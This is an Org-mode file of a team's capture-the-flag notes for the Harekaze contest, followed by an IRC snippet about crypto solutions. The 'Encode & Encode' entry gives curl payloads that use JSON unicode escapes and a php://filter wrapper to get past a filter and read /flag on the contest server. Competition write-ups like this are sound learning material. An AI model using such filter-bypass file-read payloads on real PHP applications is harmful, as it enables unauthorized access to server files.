* DONE Welcome [Misc 10]

Solved: wasamasa

- Copy and paste that flag!

* DONE scramble [Reversing 100]

Solved: Oblivion

- ELF binary messing around with program memory
- It decompiles in Ghidra, but it's all gibberish
- Oblivion solved it with some code

* DONE ONCE UPON A TIME [Crypto 100]

Solved: WTFH4X

- Cryptosystem doing matrix multiplication with some randomization
- Given the length of the output, there's four possible ways it has
 been created (since it's two parts and randomization allows each to
 happen two ways)
- I have no idea how to solve linear algebra problems :(

* DONE Baby ROP [Pwn 100]

Solved: semchapeu

* TODO The Steganography Generator [Reversing 200]

- Decompiles cleanly
- The Java code mutates certain pixels of the image
- It uses a bytestream composed of some magic bytes followed by the
 flag

* DONE Twenty-five [Crypto 100]

Solved: wasamasa

- Goal: Translate crypto.txt to valid perl code
- I did forego frequency analysis and instead looked for
 unusual/unique words among the reserved keywords list
- =qq= is a good start, from then one one can guess =qx= and continue
 until figuring out all letters
- Searching reserved.txt for patterns like =^a..b$= is the way
- Change the code to =print($text);= to see your progress and comment
 out =eval($text);=
- Evaluating the fully translated code will print the flag

* DONE Encode & Encode [Web 100]

Solved: wasamasa

- The key insight here is that the check is done before JSON decoding
- So, you can enter something not matching the filter, but which
 decodes into something exfiltrating the flag
- A second bypass is required, for this you can use the same trick to
 invoke a PHP wrapper that filters output
- I picked =php://filter= to ROT13-encode the flag on its way out...

#+BEGIN_SRC shell-script
curl -i -H 'Content-Type: application/json' --data '{"page": "./index.html "}' http://problem.harekaze.com:10001/query.php
curl -i -H 'Content-Type: application/json' --data '{"page": "/flag"}' http://problem.harekaze.com:10001/query.php
curl -i -H 'Content-Type: application/json' --data '{"page": "/\u0066lag"}' http://problem.harekaze.com:10001/query.php
curl -i -H 'Content-Type: application/json' --data '{"page": "php\u003a//filter/read=string.rot13/resource=/\u0066lag"}' http://problem.harekaze.com:10001/query.php
#+END_SRC

* DONE Baby ROP 2 [Pwn 200]

Solved: semchapeu

* TODO show me your private key [Crypto 200]

- I don't understand ECC at all
- I should learn some sagemath

* TODO Admin's Product key [Reversing 200]

- No clue

* TODO Login System [Pwn 200]

- semchapeu is taking this one on

* TODO Easy Notes [Web 200]

- Lots of carefully written PHP
- No obvious way to change the session contents
- I've tried to leak the environment variables instead, no luck either
- Maybe it's =$type=?

* DONE [a-z().] [Misc 200]

Solved: WTFH4X

- This one's terrible
- 1337 is 7*191
- You can obtain numbers by using =length= on an array or string
- You can obtain properties without uppercase letters
- You can call functions with 0 or 1 arguments
- I got some numbers out of this, but nothing close
- Crazy idea: Obtain running time and hope it matches eventually
- Crazy idea: Reverse DNS on a numerically represented IP address
- Neither will work because the VM namespace is seriously limited
- There's some top-level functions with short names like
 =console.log.name=
- Candidates can be obtained by pressing the tab key twice inside a
 =node= REPL and testing against the VM
- You can build an algebra by using =concat= on strings and =repeat=
 on lengths
- This together with a short enough primitive for 8 and 7 gives you
 the following term: 7*((8+8+7)*8+7)

* DONE Now We Can Play!! [Crypto 200]

Solved: WTFH4X

- Some funky crypto exchange

* TODO One Quadrillion [Crypto 200]

- Some unreadable hashing function

* TODO Harekaze Note [Pwn 300]

- semchapeu is taking this one on

* DONE Avatar Uploader 1 [Misc 100]

Solved: wasamasa

- The flag can be obtained by triggering an error path in the uploader
- It looks as if you just need a mangled PNG file
- This code gives you the flag:

#+BEGIN_SRC shell-script
convert xc:red -size 1x1 1x1.png
head -c20 1x1.png > broken.png
#+END_SRC

* TODO Avatar Uploader 2 [Web 300]

- The flag is in the file system, so some exfiltration is required

* TODO Ramen [Pwn 400]

- I'll let semchapeu deal with this

* TODO SQLite Voting [Web 350]

- SQL injection, but not was we know it
- The most severe restriction is no whitespace, followed by none of
 the usual characters
- You only get a binary response back

* Other

08:22 < WTFH4X> once upon a time:
08:22 < wasa> you can write it into a file
08:23 < WTFH4X> takenoko is just matrix multiplication % 251 -> so multiply encrypted flag by modular inverse of m2
08:23 < WTFH4X> from left side and from right side, take the one that gives printable flag
08:24 < WTFH4X> now we can play:
08:24 < WTFH4X> pass c1, c2 back to the server
08:25 < WTFH4X> you get back: pow(3, randint(2**16, 2**17), p) * flag % p
08:25 < WTFH4X> just brute all values of that random
08:26 < WTFH4X> for i in xrange(2**16, 2**17):  x = c * inverse(pow(3, i, p), p) % p; if is_printable(x): print(x)
08:26 < WTFH4X> smth like that